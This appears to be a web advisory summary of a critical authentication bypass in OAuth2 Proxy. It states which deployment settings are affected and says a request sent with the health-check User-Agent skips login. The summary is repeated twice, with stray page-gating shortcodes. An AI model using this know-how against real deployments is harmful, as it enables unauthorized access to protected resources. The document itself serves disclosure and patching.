EXECUTIVE SUMMARY:
CVE-2026-34457 with a CVSS score of 9.1 is a critical vulnerability in OAuth2 Proxy, a reverse proxy that provides authentication using OAuth2 providers. The affected products are the go/github.com/oauth2-proxy/oauth2-proxy/v7 and go/github.com/oauth2-proxy/oauth2-proxy packages, specifically versions prior to 7.15.2 and versions up to and including 3.2.0. This vulnerability allows for a configuration-dependent authentication bypass in deployments where OAuth2 Proxy is used with an auth_request-style integration, such as nginx auth_request, and either --ping-user-agent is set or --gcp-healthchecks is enabled. An attacker with network access can exploit this vulnerability by sending a request with the configured health check User-Agent value, which allows them to bypass authentication and access protected upstream resources without completing the normal login flow. The business impact and consequences of this exploitation are significant, as an attacker can gain unauthorized access to sensitive resources, potentially leading to data breaches, unauthorized modifications, or disruptions to business operations. The prerequisites or conditions required for exploitation are that OAuth2 Proxy is used with an auth_request-style integration, and either --ping-user-agent is set or --gcp-healthchecks is enabled.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
CVE-2026-34457 with a CVSS score of 9.1 is a critical vulnerability in OAuth2 Proxy, a reverse proxy that provides authentication using OAuth2 providers. The affected products are the go/github.com/oauth2-proxy/oauth2-proxy/v7 and go/github.com/oauth2-proxy/oauth2-proxy packages, specifically versions prior to 7.15.2 and versions up to and including 3.2.0. This vulnerability allows for a configuration-dependent authentication bypass in deployments where OAuth2 Proxy is used with an auth_request-style integration, such as nginx auth_request, and either --ping-user-agent is set or --gcp-healthchecks is enabled. An attacker with network access can exploit this vulnerability by sending a request with the configured health check User-Agent value, which allows them to bypass authentication and access protected upstream resources without completing the normal login flow. The business impact and consequences of this exploitation are significant, as an attacker can gain unauthorized access to sensitive resources, potentially leading to data breaches, unauthorized modifications, or disruptions to business operations. The prerequisites or conditions required for exploitation are that OAuth2 Proxy is used with an auth_request-style integration, and either --ping-user-agent is set or --gcp-healthchecks is enabled.[emaillocker id="1283"]
RECOMMENDATION:
We recommend you to update OAuth2 Proxy to below version: https://github.com/advisories/GHSA-5hvv-m4w4-gf6v
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-5hvv-m4w4-gf6v